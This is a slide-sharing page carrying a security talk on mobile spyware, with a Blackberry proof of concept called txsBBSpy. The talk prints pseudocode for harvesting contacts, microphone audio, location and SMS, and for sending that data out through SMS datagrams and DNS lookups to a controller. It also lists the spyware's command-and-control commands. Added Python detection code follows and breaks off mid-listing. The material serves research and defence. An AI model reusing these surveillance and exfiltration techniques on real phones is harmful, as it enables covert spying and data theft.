Social and Mobile and Cloud - OH MY!
Social and Mobile and Cloud - OH MY!Social and Mobile and Cloud - OH MY!
Social and Mobile and Cloud - OH MY!
 
Social Media Basics: Security Loopholes with Twitter & Other Social Media
Social Media Basics: Security Loopholes with Twitter & Other Social MediaSocial Media Basics: Security Loopholes with Twitter & Other Social Media
Social Media Basics: Security Loopholes with Twitter & Other Social Media
 
United Security Summit 2011 - Using the Mobile Top 10 as a Guide to Assessing...
United Security Summit 2011 - Using the Mobile Top 10 as a Guide to Assessing...United Security Summit 2011 - Using the Mobile Top 10 as a Guide to Assessing...
United Security Summit 2011 - Using the Mobile Top 10 as a Guide to Assessing...
 
Shmoocon 2010 - The Monkey Steals the Berries
Shmoocon 2010 - The Monkey Steals the BerriesShmoocon 2010 - The Monkey Steals the Berries
Shmoocon 2010 - The Monkey Steals the Berries
 
Survey of Rootkit Technologies and Their Impact on Digital Forensics
Survey of Rootkit Technologies and Their Impact on Digital ForensicsSurvey of Rootkit Technologies and Their Impact on Digital Forensics
Survey of Rootkit Technologies and Their Impact on Digital Forensics
 
Source Boston 2009 - Anti-Debugging A Developers Viewpoint
Source Boston 2009 - Anti-Debugging A Developers ViewpointSource Boston 2009 - Anti-Debugging A Developers Viewpoint
Source Boston 2009 - Anti-Debugging A Developers Viewpoint
 
Static Detection of Application Backdoors
Static Detection of Application BackdoorsStatic Detection of Application Backdoors
Static Detection of Application Backdoors
 
Blackhat Europe 2009 - Detecting Certified Pre Owned Software
Blackhat Europe 2009 - Detecting Certified Pre Owned SoftwareBlackhat Europe 2009 - Detecting Certified Pre Owned Software
Blackhat Europe 2009 - Detecting Certified Pre Owned Software
 
Anti-Debugging - A Developers View
Anti-Debugging - A Developers ViewAnti-Debugging - A Developers View
Anti-Debugging - A Developers View
 
Praetorian Veracode Webinar - Mobile Privacy
Praetorian Veracode Webinar - Mobile PrivacyPraetorian Veracode Webinar - Mobile Privacy
Praetorian Veracode Webinar - Mobile Privacy
 
Owasp Ireland - The State of Software Security
Owasp  Ireland - The State of Software SecurityOwasp  Ireland - The State of Software Security
Owasp Ireland - The State of Software Security
 
More Apps More Problems
More Apps More ProblemsMore Apps More Problems
More Apps More Problems
 
Dirty Little Secret - Mobile Applications Invading Your Privacy
Dirty Little Secret - Mobile Applications Invading Your PrivacyDirty Little Secret - Mobile Applications Invading Your Privacy
Dirty Little Secret - Mobile Applications Invading Your Privacy
 
IT Hot Topics - Mobile Security Threats at Every Layer
IT Hot Topics - Mobile Security Threats at Every LayerIT Hot Topics - Mobile Security Threats at Every Layer
IT Hot Topics - Mobile Security Threats at Every Layer
 
IQT 2010 - The App Does That!?
IQT 2010 - The App Does That!?IQT 2010 - The App Does That!?
IQT 2010 - The App Does That!?
 
Triangle InfoSecCon - Detecting Certified Pre-Owned Software and Devices
Triangle InfoSecCon - Detecting Certified Pre-Owned Software and DevicesTriangle InfoSecCon - Detecting Certified Pre-Owned Software and Devices
Triangle InfoSecCon - Detecting Certified Pre-Owned Software and Devices
 
Intelligence on the Intractable Problem of Software Security
Intelligence on the Intractable Problem of Software SecurityIntelligence on the Intractable Problem of Software Security
Intelligence on the Intractable Problem of Software Security
 

Recently uploaded

Training state-of-the-art general text embedding
Training state-of-the-art general text embeddingTraining state-of-the-art general text embedding
Training state-of-the-art general text embeddingZilliz
 
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek SchlawackFwdays
 
TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024Lonnie McRorey
 
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptx
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptxThe Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptx
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptxLoriGlavin3
 
"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii Soldatenko"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii SoldatenkoFwdays
 
Rise of the Machines: Known As Drones...
Rise of the Machines: Known As Drones...Rise of the Machines: Known As Drones...
Rise of the Machines: Known As Drones...Rick Flair
 
What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024Stephanie Beckett
 
What is DBT - The Ultimate Data Build Tool.pdf
What is DBT - The Ultimate Data Build Tool.pdfWhat is DBT - The Ultimate Data Build Tool.pdf
What is DBT - The Ultimate Data Build Tool.pdfMounikaPolabathina
 
Artificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptxArtificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptxhariprasad279825
 
TrustArc Webinar - How to Build Consumer Trust Through Data Privacy
TrustArc Webinar - How to Build Consumer Trust Through Data PrivacyTrustArc Webinar - How to Build Consumer Trust Through Data Privacy
TrustArc Webinar - How to Build Consumer Trust Through Data PrivacyTrustArc
 
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptxMerck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptxLoriGlavin3
 
SALESFORCE EDUCATION CLOUD | FEXLE SERVICES
SALESFORCE EDUCATION CLOUD | FEXLE SERVICESSALESFORCE EDUCATION CLOUD | FEXLE SERVICES
SALESFORCE EDUCATION CLOUD | FEXLE SERVICESmohitsingh558521
 
Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!Manik S Magar
 
A Journey Into the Emotions of Software Developers
A Journey Into the Emotions of Software DevelopersA Journey Into the Emotions of Software Developers
A Journey Into the Emotions of Software DevelopersNicole Novielli
 
Advanced Computer Architecture – An Introduction
Advanced Computer Architecture – An IntroductionAdvanced Computer Architecture – An Introduction
Advanced Computer Architecture – An IntroductionDilum Bandara
 
How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.Curtis Poe
 
A Deep Dive on Passkeys: FIDO Paris Seminar.pptx
A Deep Dive on Passkeys: FIDO Paris Seminar.pptxA Deep Dive on Passkeys: FIDO Paris Seminar.pptx
A Deep Dive on Passkeys: FIDO Paris Seminar.pptxLoriGlavin3
 
Time Series Foundation Models - current state and future directions
Time Series Foundation Models - current state and future directionsTime Series Foundation Models - current state and future directions
Time Series Foundation Models - current state and future directionsNathaniel Shimoni
 
The Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and ConsThe Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and ConsPixlogix Infotech
 
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024BookNet Canada
 

Recently uploaded (20)

Training state-of-the-art general text embedding
Training state-of-the-art general text embeddingTraining state-of-the-art general text embedding
Training state-of-the-art general text embedding
 
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
 
TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024
 
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptx
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptxThe Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptx
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptx
 
"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii Soldatenko"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii Soldatenko
 
Rise of the Machines: Known As Drones...
Rise of the Machines: Known As Drones...Rise of the Machines: Known As Drones...
Rise of the Machines: Known As Drones...
 
What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024
 
What is DBT - The Ultimate Data Build Tool.pdf
What is DBT - The Ultimate Data Build Tool.pdfWhat is DBT - The Ultimate Data Build Tool.pdf
What is DBT - The Ultimate Data Build Tool.pdf
 
Artificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptxArtificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptx
 
TrustArc Webinar - How to Build Consumer Trust Through Data Privacy
TrustArc Webinar - How to Build Consumer Trust Through Data PrivacyTrustArc Webinar - How to Build Consumer Trust Through Data Privacy
TrustArc Webinar - How to Build Consumer Trust Through Data Privacy
 
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptxMerck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptx
 
SALESFORCE EDUCATION CLOUD | FEXLE SERVICES
SALESFORCE EDUCATION CLOUD | FEXLE SERVICESSALESFORCE EDUCATION CLOUD | FEXLE SERVICES
SALESFORCE EDUCATION CLOUD | FEXLE SERVICES
 
Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!
 
A Journey Into the Emotions of Software Developers
A Journey Into the Emotions of Software DevelopersA Journey Into the Emotions of Software Developers
A Journey Into the Emotions of Software Developers
 
Advanced Computer Architecture – An Introduction
Advanced Computer Architecture – An IntroductionAdvanced Computer Architecture – An Introduction
Advanced Computer Architecture – An Introduction
 
How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.
 
A Deep Dive on Passkeys: FIDO Paris Seminar.pptx
A Deep Dive on Passkeys: FIDO Paris Seminar.pptxA Deep Dive on Passkeys: FIDO Paris Seminar.pptx
A Deep Dive on Passkeys: FIDO Paris Seminar.pptx
 
Time Series Foundation Models - current state and future directions
Time Series Foundation Models - current state and future directionsTime Series Foundation Models - current state and future directions
Time Series Foundation Models - current state and future directions
 
The Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and ConsThe Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and Cons
 
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
 

iSec Forum NYC - Smartphone Backdoors an Analysis of Mobile Spyware

  • 1. Smartphone Backdoors An Analysis of Blackberry and Other Mobile Device Spyware The Monkey Steals The Berries
  • 2. Presenter Background
      Currently
          Sr. Security Researcher, Veracode, Inc.
      Previously
          Security Consultant - Symantec
          Security Consultant - @Stake
          Incident Response and Forensics Handler – US Government
      Wishes He Was
          Infinitely Rich
          Personal Trainer to hot Hollywood starlets
  • 3. Mobile Spyware
      - Often includes modifications to legitimate programs designed to compromise the device or device data
      - Often inserted by those who have legitimate access to source code or distribution binaries
      - May be intentional or inadvertent
      - Not specific to any particular programming language
      - Not specific to any particular mobile Operating System
  • 4. Attacker Motivation
      - Practical method of compromise for many systems
          – Let the users install your backdoor on systems you have no access to
          – Looks like legitimate software so may bypass mobile AV
      - Retrieve and manipulate valuable private data
          – Looks like legitimate application traffic so little risk of detection
      - For high value targets such as financial services and government it becomes cost effective and more reliable
          – High-end attackers will not be content to exploit opportunistic vulnerabilities, which might be fixed and therefore unavailable at a critical juncture. They may seek to implant vulnerability for later exploitation
          – Think “Aurora” for Mobile Devices
  • 5. Why is Mobile The Future of Spyware
  • 6. Units Sold By Operating System
      [Bar chart. Y axis: Units Sold; X axis: Operating System (Symbian, Research In Motion, iPhone OS, Microsoft Windows Mobile, Linux, Android, WebOS, Other OSs); series: 2008 Units, 2009 Units. Data Source: DISTMO Appstore Analytics, www.appstore.info]
  • 7. Units Sold Market Growth
      [Bar chart. Y axis: Percentage Growth in Market Share; X axis: Operating System (Symbian, Research In Motion, iPhone OS, Microsoft Windows Mobile, Linux, Android, WebOS, Other OSs). Data Source: DISTMO Appstore Analytics, www.appstore.info]
  • 8. Application Counts
      [Bar chart. Y axis: Number Of Applications In Store, Last Counted Jan/Feb 2010; X axis: Marketplace Name (iPhone App Store, Android Marketplace, Nokia Ovi Store (Maemo), Blackberry App World, Palm App Catalog, Windows Marketplace). Data labels in extraction order: 150,998; 19,897; 6118; 5291; 1452; 944. Data Source: DISTMO Appstore Analytics, www.appstore.info]
  • 9. iPhone Applications Sold
      [Chart. Y axis: Applications Sold (In Billions). Data Source: Gartner, Inc., a research and advisory firm]
  • 10. Back To The Future
  • 11. Back To The Future
  • 12. Case Studies of Mobile Spyware
  • 13. FlexiSpy
      - http://www.flexispy.com
      - $149 - $350 PER YEAR depending on features
      - Features
          – Remote Listening
          – C&C Over SMS
          – SMS and Email Logging
          – Call History Logging
          – Location Tracking
          – Call Interception
          – GPS Tracking
          – Symbian, Blackberry, Windows Mobile Supported
  • 14. Mobile Spy
      - http://www.mobile-spy.com
      - $49.97 PER QUARTER or $99.97 PER YEAR
      - Features
          – SMS Logging
          – Call Logging
          – GPS Logging
          – Web URL Logging
          – BlackBerry, iPhone (Jailbroken Only), Android, Windows Mobile or Symbian
  • 15. Etisalat (SS8)
      - Cell carrier in United Arab Emirates (UAE)
      - Pushed via SMS as “software patch” for Blackberry smartphones
      - Upgrade urged to “enhance performance” of Blackberry service
      - Blackberry PIN messaging as C&C
      - Sets FLAG_HIDDEN bit to true
      - Interception of outbound email / SMS only
      - Discovered because a flooded listener server caused retries that drained the batteries of affected devices
      - Accidentally released the .jar as well as the .cod (ooopsie?!)
  • 16. Bugs & PhoneSnoop
      - Bugs
          – Exfiltration of inbound and outbound email
          – Hidden
      - PhoneSnoop
          – Remotely turn on a Blackberry phone microphone
          – Listen in on target ambient conversation
  • 17. Storm8 Phone Number Farming – iMobsters and Vampires Live (and others) – “Storm8 has written the software for all its games in such a way that it automatically accesses, collects, and transmits the wireless telephone number of each iPhone user who downloads any Storm8 game," the suit alleges. " ... Storm8, though, has no reason whatsoever to access the wireless phone numbers of the iPhones on which its games are installed." – “Storm8 says that this code was used in development tests, only inadvertently remained in production builds, and removed as soon as it was alerted to the issue.” – These were available via the iTunes App Store! – http://www.boingboing.net/2009/11/05/iphone-game-dev-accu.html © 2010 Veracode, Inc. 20
  • 18. Symbian Sexy Space – Poses as legitimate server ACSServer.exe – Calls itself 'Sexy Space„ – Steals phone and network information – Exfiltrates data via hacker owned web site connection – Can SPAM contact list members – Basically a “botnet” for mobile phones – Signing process  Anti-virus scan using F-Secure - Approx 43% proactive detection rate (PCWorld)  Random selection of inbound manually assessed – Symbian signed this binary as safe! – http://news.zdnet.co.uk/security/0,1000000189,39684313,00.htm © 2010 Veracode, Inc. 21
  • 19. 09Droid – Banking Applications Attack
      - Droid app that masquerades as any number of different target banking applications
      - Target banks included
          - Royal Bank of Canada
          - Chase
          - BB&T
          - SunTrust
          - Over 50 total financial institutions were affected
      - May steal and exfiltrate banking credentials
      - Approved and downloaded from Google’s Android Marketplace!
      - http://www.theinquirer.net/inquirer/news/1585716/fraud-hits-android-apps-market
      - http://www.pcadvisor.co.uk/news/index.cfm?RSS&NewsID=3209953
      - http://www.f-secure.com/weblog/archives/00001852.html
  • 20. Blackberry Security Mechanisms
  • 21. Blackberry Takes Security Seriously
      - KB05499: Protecting the BlackBerry smartphone and BlackBerry Enterprise Server against malware
        http://www.blackberry.com/btsc/search.do?cmd=displayKC&docType=kc&externalId=KB05499
      - Protecting the BlackBerry device platform against malware
        http://docs.blackberry.com/en/admin/deliverables/1835/Protecting the BlackBerry device platform against malware.pdf
      - Placing the BlackBerry Enterprise Solution in a segmented network
        http://docs.blackberry.com/en/admin/deliverables/1460/Placing_the_BlackBerry_Enterprise_Solution_in_a_Segmented_Network.pdf
      - BlackBerry Enterprise Server Policy Reference Guide
        http://docs.blackberry.com/en/admin/deliverables/7228/Policy_Reference_Guide.pdf
  • 22. Does It Really Matter?!
      - Only 23% of smartphone owners use the security software installed on the devices. (Source: Trend Micro Inc. survey of 1,016 U.S. smartphone users, June 2009)
      - 13% of organizations currently protect from mobile viruses (Mobile Security 2009 Survey by Goode Intelligence)
  • 23. Code Signing
      - Subset of Blackberry API considered “controlled”
      - Use of controlled package, class, or method requires appropriate code signature
      - Blackberry Signature Tool comes with the Blackberry JDE
      - Acquire signing keys by filling out a web form and paying $20
          - This is not a high barrier to entry
          - 48 hours later you receive signing keys
      - Install keys into signature tool
  • 24. Code Signing Process
      - Hash of code sent to RIM for API tracking purposes only
      - RIM does not get source code
      - COD file is signed based on required keys
      - Application ready to be deployed
      - Easy to acquire anonymous keys
  • 25. IT Policies
      - Requires connection to Blackberry Enterprise Server (BES)
      - Supersedes lower levels of security restrictions
      - Prevent devices from downloading third-party applications over wireless
      - Prevent installation of specific third-party applications
      - Control permissions of third party applications
          - Allow Internal Connections
          - Allow Third-Party Apps to Use Serial Port
          - Allow External Connections
      - MOSTLY “Default Allow All” policy for BES and non-BES devices
  • 26. Application Policies
      - Can be controlled at the BES
      - If no BES present, controls are set on the handheld itself
      - Can only be MORE restrictive than the IT policy, never less
      - Control individual resource access per application
      - Control individual connection access per application
      - MOSTLY “Default Allow All” policy for BES and non-BES devices
  • 27. V4.7.0.148 Default 3rd Party Application Permissions
      - Permission grid: Bluetooth Connections, Phone Connections, USB Connections, Location Data, Internet, IPC, Device Settings, Application Management, Media, Themes, Input Simulation, Security Timer Reset, Browser Filtering, Recording, Email Data, Organizer Data, Files, Security Data
  • 28. V5.0.0.328 Default 3rd Party Application Permissions
      - Permission grid: Bluetooth Connections, Phone Connections, USB Connections, Location Data, Server Network, Internet, IPC, Device Settings, Application Management, Media, Themes, Input Simulation, Security Timer Reset, Display Information While Locked, Browser Filtering, Recording, Email Data, Organizer Data, Files, Security Data
  • 29. V5.0.0.328 Trusted 3rd Party Application Permissions
      - Permission grid: Bluetooth Connections, Phone Connections, USB Connections, Location Data, Server Network, Internet, IPC, Device Settings, Application Management, Media, Themes, Input Simulation, Security Timer Reset, Display Information While Locked, Browser Filtering, Recording, Email Data, Organizer Data, Files, Security Data
  • 30. Installation Methods
  • 31. Installation Methods
      - Accessing a web site using the BlackBerry Browser and choosing to download the application over the network (OTA Installation)
      - Running the application loader tool of the BlackBerry Desktop Manager and choosing to download the application onto the BlackBerry device using a physical connection to the computer
      - Blackberry BES push the application to your user community
      - Get it into the Blackberry App World and let the user choose to install it for you!
  • 32. Installation Files
      - .COD files: A COD file is a proprietary file format developed by RIM that contains compiled and packaged application code.
      - .JAD files: An application descriptor that stores information about the application itself and the location of .COD files
      - .JAR files: A JAR file (or Java ARchive) is used for aggregating many files into one. It is generally used to distribute Java classes and associated metadata.
      - .ALX files: Similar to the .JAD file, in that it holds information about where the installation files for the application are located
  • 33. txsBBSpy Effects and Behaviors
  • 34. txsBBSpy Logging and Dumping
      - Monitor connected / disconnected calls
      - Monitor PIM added / removed / updated
      - Monitor inbound SMS
      - Monitor outbound SMS
      - Real Time track GPS coordinates
      - Dump all contacts
      - Dump current location
      - Dump phone logs
      - Dump email
      - Dump microphone capture (security prompted)
  • 35. txsBBSpy Exfiltration and C&C Methods
      - SMS (No CDMA)
      - SMS Datagrams (Supports CDMA)
      - Email
      - HTTP GET
      - HTTP POST
      - TCP Socket
      - UDP Socket
      - DNS Exfiltration
      - Default command and control to inbound SMS
      - TXSPROTO Bidirectional TCP based command and control
  • 36. txsBBSpy Technical Specifications
  • 37. Technical Methods
      - Data Dumpers
      - Listeners
      - Exfiltration Methods
      - Command and Control
  • 38. Dump Contact Information
      - API
          - javax.microedition.pim
          - net.rim.blackberry.api.pdap
      - Pseudocode
          PIM pim = PIM.getInstance();
          BlackBerryPIMList contacts = (BlackBerryPIMList) pim.openPIMList(PIM.CONTACT_LIST, PIM.READ_ONLY);
          Enumeration eContacts = contacts.items();
          Contact contact = (Contact) eContacts.nextElement();
          if (contacts.isSupportedField(Contact.EMAIL)) {
              if (contact.countValues(Contact.EMAIL) > 0)
                  email = contact.getString(Contact.EMAIL, 0);
          }
  • 39. Dump Microphone
      - API
          - javax.microedition.media.control
          - javax.microedition.media.Manager
          - javax.microedition.media.Player
      - Pseudocode
          Player p = Manager.createPlayer("capture://audio");
          RecordControl rc = (RecordControl)p.getControl("RecordControl");
          ByteArrayOutputStream os = new ByteArrayOutputStream();
          rc.setRecordStream(os);
          rc.startRecord();
  • 40. Location Listener
      - Create the class that implements LocationListener Interface
      - Get LocationProvider instance
      - Add LocationListener
      - API
          - javax.microedition.location.LocationProvider.getInstance
          - javax.microedition.location.LocationProvider.setLocationListener
      - Pseudocode
          ll = new LocListener();
          lp = LocationProvider.getInstance(null);
          lp.setLocationListener(ll, 1, 1, 1);
  • 41. SMS Outbound Listener
      - Create class that implements “SendListener” interface
      - Add the SendListener
      - API
          - net.rim.blackberry.api.sms.SMS
          - javax.wireless.messaging.TextMessage
      - Pseudocode
          sl = new SMSOUTListener();
          SMS.addSendListener(sl);
  • 42. PIM Listener
      - Create the class that implements PIMListListener Interface
      - Open Target PIMList and Add PIMListListener
      - API
          - javax.microedition.pim.PIM.getInstance()
          - net.rim.blackberry.api.pdap.BlackBerryPIMList.addListener
      - Pseudocode
          pl = new PhoneLogger();
          pim = PIM.getInstance();
          contacts = (BlackBerryPIMList) pim.openPIMList(PIM.CONTACT_LIST, PIM.READ_ONLY);
          contacts.addListener(pl);
  • 43. SMS Datagram Exfiltration
      - API
          - javax.microedition.io.Connector
          - javax.microedition.io.DatagramConnection
          - javax.microedition.io.Datagram
      - Pseudocode
          DatagramConnection dc = (DatagramConnection)Connector.open("sms://"+this.pnum+":3590");
          Datagram d = dc.newDatagram(dc.getMaximumLength());
          byte[] buf = msg.getBytes();
          d.setData(buf, 0, buf.length);
          d.write(buf, 0, buf.length);
          dc.send(d);
  • 44. DNS Exfiltration
          do {
              // Code to trim the message to 200 chars per iteration
              try {
                  msg2 = Base64OutputStream.encodeAsString(msg2.getBytes(), 0, msg2.length(), false, false);
                  conn = (DatagramConnection)Connector.open("udp://"+msg2+"."+this.domain+":7272;4444");
                  conn.close();
              } catch (ConnectionNotFoundException e) {
                  return;
              } catch (IOException e){
                  // Do nothing, just catch and ignore
              }
          } while (msg.length() > 200);
  • 45. Threaded Exfiltration
      - Listener based exfiltration methods use separate thread
      - Doesn't freeze the UI
      - Queues messages outbound if network is slow
      - ThreadedSend extends Thread class
      - Uses run() method to call exfiltrate()
  • 46. Command and Control Channels
      - Default is inbound SMS communication
      - Bidirectional TXSPROTO TCP based command and control
          - Additional Stealth (intentionally not completely invisible)
          - Allows for pretty GUI clients (basic mock up done)
          - Will more easily allow for control of multiple victims
          - Can be used to easily implement novelty attacks
              - Swap the contact databases of two victims
              - Easily have phone A call phone B
              - Integrated Google Earth tracking of victim without parsing return email responses
              - Much more shenanigans!
  • 47. Command and Control Channels
      - initCandC(int a)
          - Initializes inbound SMS listener if passed a == 1
          - Kills spyware otherwise
          - Listens for commands and acts accordingly
      - Commands
          TXSDIE
          TXSPHLON       TXSPHLOFF
          TXSPIMON       TXSPIMOFF
          TXSSLINON      TXSSLINOFF
          TXSSLOUTON     TXSSLOUTOFF
          TXSGLON        TXSGLOFF
          TXSEXFILSMS    TXSEXFILSMSDG   TXSEXFILEMAIL   TXSEXFILGET
          TXSEXFILPOST   TXSEXFILTCP     TXSEXFILUDP     TXSEXFILDNS
          TXSDUMPGPS     TXSDUMPPL       TXSDUMPEMAIL    TXSDUMPMIC     TXSDUMPCON
          TXSPROTO       TXSPORT[PORT]   TXSPHONE:[PN]   TXSURL[URL]    TXSGTIME:[N]
          TXSPING        TXS:[HOST]      TXSIP:[IP]      TXSEM:[EMAIL]
  • 48. Methods of Detection and Future Work
  • 49. Methods of Detection
      - Additional Operating System Prompts
          - Remove the “Trust Application” prompt requiring individual configuration
      - Signature Based
          - This is how the current anti-virus world is failing
      - Sandbox Based Execution Heuristics
          - Still requires execution in a sandbox and is reactive
          - Can't ensure complete execution
      - Static Decompilation and Analysis
          - Enumeration of sources of sensitive taint and exfiltration sinks
          - Control/Data flow mapping for tracing sensitive taint from source to sink
          - Compare findings against expected values
  • 50. Future Work (Offensive AND Defensive)
      - Reverse engineer .cod file format
      - Continued research into unobstructed installation methods (requires exploitation)
      - Infect PC with virus that acts as distribution hub
      - Research additional exfiltration methods for tunneling without prompting
      - Unrelated but interesting (Other cool ideas)
          - Memory walking for unsigned persistent and runtime storage
          - Combine coddec with application downloads from marketplace
          - Enumerate marketplace for existence of backdoors
  • 52. Conclusion
      - We are currently trusting the vendor application store provider for the majority of our mobile device security
      - Minimal methods of real time eradication or detection of spyware type activities
      - No easy/automated way to confirm for ourselves what the applications are actually doing
  • 53. The Monkey Steals the Berries! Questions?
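A detection-side counterpart to slide 44 (DNS Exfiltration), added here as an example and not taken from the presentation: it checks queried names in a resolver log for a base64-encoded leftmost label and counts hits per client and parent domain. The log format, the sample names, the reason labels and the thresholds are assumptions.

```python
import base64
import binascii
import re
from collections import Counter

B64_LABEL = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")

def label_reasons(qname):
    """Reasons the leftmost label of qname looks like base64-encoded data."""
    label = qname.rstrip(".").split(".")[0]
    reasons = []
    if len(label) > 63:                     # RFC 1035 limit for a single label
        reasons.append("label-over-63-octets")
    if re.search(r"[+/=]", label):          # outside the letter-digit-hyphen hostname set
        reasons.append("non-hostname-chars")
    if len(label) >= 16 and len(label) % 4 == 0 and B64_LABEL.match(label):
        try:
            raw = base64.b64decode(label, validate=True)
        except (binascii.Error, ValueError):
            raw = b""
        printable = sum(32 <= b < 127 for b in raw)
        if raw and printable / len(raw) >= 0.9:
            reasons.append("decodes-to-text")
    return reasons

def suspicious_parents(log_lines, min_hits=2):
    """Map (client, parent domain) to its flagged-query count, keeping pairs with >= min_hits."""
    hits = Counter()
    for line in log_lines:
        client, qname = line.split()
        if label_reasons(qname):
            parent = qname.rstrip(".").split(".", 1)[-1]
            hits[(client, parent)] += 1
    return {pair: n for pair, n in hits.items() if n >= min_hits}

def encode_chunk(text):
    # Builds a constructed test label: base64 of one message chunk, as the slide describes.
    return base64.b64encode(text.encode()).decode()

# Constructed resolver log, one "<client> <queried name>" entry per line.
SAMPLE_LOG = [
    "10.0.0.5 www.example.com",
    "10.0.0.7 " + encode_chunk("contact: Alice Example, 555-0100") + ".collector.example",
    "10.0.0.7 " + encode_chunk("gps: 42.3601,-71.0589 at 10:15") + ".collector.example",
    "10.0.0.7 " + encode_chunk("x" * 200) + ".collector.example",
    "10.0.0.9 static-assets-cdn.example.net",
]
```

Resolver logs that fold names to lower case defeat the decode check, which leaves the length and character checks to carry the detection.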
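The static approach listed on slide 49 (enumerate sources and sinks, trace taint from source to sink, compare against expected values), as an added example that is not code from the presentation or from Veracode. It assumes a simplified decompiler output with one call per line; the method names come from the slides' pseudocode plus LocationProvider.getLocation from JSR-179, and the kind labels are hypothetical.

```python
import re

# Method names come from the slides' pseudocode, plus LocationProvider.getLocation
# (JSR-179). The one-call-per-line statement format is a constructed simplification.
SOURCES = {"openPIMList": "contacts", "getLocation": "location", "createPlayer": "microphone"}
SINKS = {"send": "datagram", "open": "connection-url"}

STMT = re.compile(r"^(?:(\w+)\s*=\s*)?(?:(\w+)\.)?(\w+)\((.*)\)$")
IDENT = re.compile(r"[A-Za-z_]\w*")

def trace_flows(statements):
    """Return the (source_kind, sink_kind) pairs reachable within one method."""
    taint = {}      # variable name -> set of source kinds it carries
    flows = set()
    for line in statements:
        m = STMT.match(line.strip().rstrip(";"))
        if not m:
            continue
        lhs, receiver, method, args = m.groups()
        args = re.sub(r'"[^"]*"', "", args)          # ignore string literals
        names = IDENT.findall(args) + ([receiver] if receiver else [])
        carried = set().union(*(taint.get(n, set()) for n in names))
        if method in SOURCES:
            carried.add(SOURCES[method])
        if method in SINKS:
            flows |= {(kind, SINKS[method]) for kind in carried}
        if lhs:
            taint[lhs] = carried                     # assignment replaces old taint
        elif receiver and carried:                   # setter call, e.g. d.setData(buf, ...)
            taint[receiver] = taint.get(receiver, set()) | carried
    return flows

def unexpected_flows(statements, expected):
    """Flows found in the code that the app's declared behaviour does not cover."""
    return trace_flows(statements) - set(expected)

# Constructed sample modelled on the contact-dump and SMS-datagram slides.
SAMPLE = [
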